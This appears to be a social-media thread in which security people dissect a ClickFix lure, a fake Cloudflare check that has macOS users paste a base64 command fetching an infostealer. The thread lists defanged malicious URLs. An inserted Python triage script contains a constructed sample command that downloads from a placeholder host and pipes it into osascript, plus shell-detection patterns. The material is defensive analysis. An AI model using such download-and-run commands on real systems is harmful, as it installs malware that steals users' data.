didn't even occur to me it's malware (of course it is, what would pasting a text string into Terminal do lol), I just assumed it's some new bullshit cloudflare is doing so I took a screenshot and closed the page - i went back and it did it again
copied the text and pasted it into a text editor and this is what it is
@jpm @decryption @Viss yeah, this thing is probably some variant of clickfix. Usually they lure you with either a prompt that looks like something themed like a google error message, or more often, cloudflare. They dump either some form of bash or if Windows, some form of powershell that is designed to grab a malicious payload from another site and run it. Most often a RAT or an infostealer.
So, good judgement on not running that.
@jpm @decryption @Viss I tried OCR'ing the image, because I'm a lazy ass, but it failed, so I manually copied the base64. Reaches out to two domains. Well, one domain that's a subdomain of the other.
https[:]//sery.volcatomix.com/vpoPqfAqD5s7SHpf
https[:]//volcatomix.com/cl/index.php
@jpm @decryption @Viss The first URL is a single pixel GIF. I don't know what its purpose is.
The second URL looks like an OSA script. My scroll buffer wasn't long enough to grab it all, but yeah, it's definitely an info stealer.
Here are the relevant URLs that it interacts with:
https[:]//stradisamplix.com/api/health
https[:]//stradisamplix.com/api/data/recieve
take note of the X-Bid header as well.
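The decoding step da_667 describes (peel the base64 out of the pasted command, pull out the URLs it contacts, note what it would execute) is worth having as a script rather than a manual copy-out. The following is an added example, not code from anyone in this thread; it builds its own constructed sample paste under placeholder `example.invalid` domains (none of the thread's real IoCs) and prints defanged URLs so the output is safe to share in a ticket:

```python
import base64
import re

# Constructed sample (NOT the thread's real IoCs): a pasted "verification" command of the
# kind the thread describes, with the real work hidden behind a base64 layer.
# The domains are placeholders under example.invalid.
_INNER = (
    'curl -s "https://pixel.example.invalid/track.gif" >/dev/null; '
    'curl -fsSL "https://example.invalid/cl/index.php" | osascript'
)
SAMPLE_PASTE = "echo " + base64.b64encode(_INNER.encode()).decode() + " | base64 -d | bash"

URL_RE = re.compile(r"https?://[^\s\"'|;)<>]+")
B64_RE = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")

# Traits a triager wants flagged; each is checked across every decoded layer.
SUSPICIOUS = [
    (r"\bbase64\s+(-d|-D|--decode)\b", "base64-decoded payload"),
    (r"\|\s*(ba|z)?sh\b", "output piped into a shell"),
    (r"\bosascript\b", "AppleScript execution (macOS)"),
    (r"\b(powershell|pwsh)\b", "PowerShell execution (Windows)"),
    (r"\b(curl|wget)\b", "remote download"),
]


def _decode_once(text):
    """Decode the first base64 token in text that yields readable UTF-8, else None."""
    for m in B64_RE.finditer(text):
        try:
            decoded = base64.b64decode(m.group(0), validate=True).decode("utf-8")
        except ValueError:  # bad padding/alphabet (binascii.Error) or not UTF-8
            continue
        if all(ch.isprintable() or ch in "\n\t" for ch in decoded):
            return decoded
    return None


def decode_layers(text, max_depth=4):
    """Return [text, layer1, layer2, ...], peeling nested base64 up to max_depth."""
    layers = [text]
    for _ in range(max_depth):
        nxt = _decode_once(layers[-1])
        if nxt is None:
            break
        layers.append(nxt)
    return layers


def defang(url):
    """Make a URL non-clickable for reports: https[:]//host[.]tld/path"""
    return url.replace("://", "[:]//").replace(".", "[.]")


def triage(pasted):
    """Summarize a pasted command: number of layers, contacted URLs, suspicious traits."""
    layers = decode_layers(pasted)
    joined = "\n".join(layers)
    urls = sorted(set(URL_RE.findall(joined)))
    findings = [label for pat, label in SUSPICIOUS if re.search(pat, joined)]
    return {"layers": len(layers), "urls": urls, "findings": findings}


if __name__ == "__main__":
    r = triage(SAMPLE_PASTE)
    print(f"decoded layers: {r['layers']}")
    print("contacts:")
    for u in r["urls"]:
        print("  " + defang(u))
    print("flags: " + "; ".join(r["findings"]))
```

Feed `triage()` the raw text you copied out of the lure (as the first poster did, into a text editor rather than a terminal); the URL list is what you hand to the proxy/DNS team to block, and the flags tell you at a glance whether it's the macOS (osascript) or Windows (PowerShell) flavour of the same lure. It only reads strings and never executes anything it decodes.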
@da_667 @jpm @decryption oh man, this is interesting. i literally used almost exactly this technique on a gig i did last year for a company who wanted a phishing test.
da_667 is probably right on the money. i don't personally track the threat actors myself, but i pay keen attention to their techniques. the screenshots he posted scream infostealer to me. it just nabs shit from your system, zips it up, and ships it to the attacker
@da_667 @jpm @decryption but the infostealer stuff is getting big because defenses are getting fucking hard to bypass. like the gig i was on was a 2 week engagement, and i spent the entire fucking time, save 2 days, trying to get around apple's codesigning requirements, google's spam filters, and various endpoint protection issues. i eventually bailed on trying to use any kinda sliver/msf/etc payload and just went with 'stupid bash'.
but it worked, like a champ.
shit sailed right through
@da_667 @jpm @decryption but in general, any website asking you to copypaste shit into the terminal is 100% shady.
and that includes every real website asking you to "curl pipe to bash". like rvm, homebrew, openclaw, and every other 'devops flavored' installer that asks you to "just trust us bro"
all that shit is a gigantic petri dish for malware
@Viss @da_667 @jpm @decryption
yeah. "curl pipe to bash" is the "lick the doorknob at the truckstop bathroom" of install methods...